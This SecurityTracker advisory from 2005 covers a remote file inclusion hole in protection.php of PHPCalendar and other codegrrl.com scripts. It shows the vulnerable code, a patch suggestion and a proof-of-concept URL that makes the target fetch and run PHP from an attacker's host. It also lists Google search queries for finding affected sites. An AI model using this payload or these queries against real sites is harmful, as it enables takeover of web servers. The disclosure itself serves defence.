SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Calendar)  >  PHPCalendar Vendors:  [Multiple Authors/Vendors]
PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, and PHPQuotes Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015206
SecurityTracker URL:  http://securitytracker.com/id?1015206
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 15 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  Robin Verton reported a vulnerability in PHPCalendar and other scripts available via 'codegrrl.com'. A remote user can execute arbitrary code on the target system.

The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/protection.php?action=logout&siteurl=http://[remote]/malicoius-code.txt

The PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, and PHPQuotes scripts available via 'codegrrl.com' are affected.
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  codegrrl.com/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Robin Verton" <r.verton@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Sun, 13 Nov 2005 17:34:15 +0100
From:  "Robin Verton" <r.verton@gmail.com>
Subject:  PHPCalendar (and some more codegrrl.com products) arbitrary code execution

 
PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================
 
 
   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]
 
 
   Description:
 
 Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters to mantain a ca
lendar, with all upcoming events and birthdays.
 It was designed to be used at personal sites, but it can also be very useful for fansites, to keep t
rack of tours, premiers, awards shows,
 tv apearances, interviews, magazines features, and many more! You can see it in use at unfloopy.net.

 [http://www.codegrrl.com/]
 
 
   Details:
 
 1) protection.php (with register_globals = On)
    If register_globals is on an attacker can include an arbitrary php file to execute malicious code
.
 
 
 
    $logout_page = "$siteurl";
 
    [...]
 
    if ($action == "logout")
    {
         Setcookie("logincookie[pwd]","",time() -86400);
         Setcookie("logincookie[user]","",time() - 86400);
         @include($logout_page);
  exit;
    }
 
   Proof of Concept:
 
    To exploit this vulnerability an attacker only has to use the following HTTP-Request:
    http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-cod
e.txt
 
   Patch:
           Set register_globals in the php.ini off or disallow direct access to the protection.php f.
e. define constants and use
           code like
 
    if( !defined('IN_SYS') ) {
     die('Hacking attempt');
    }
 
    to prevent the direct access
 
   Credits:
 
       Credit goes to Robin Verton, 15 years old from Germany
 
   References:
 
       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about 44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about 44,000 results]
       [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC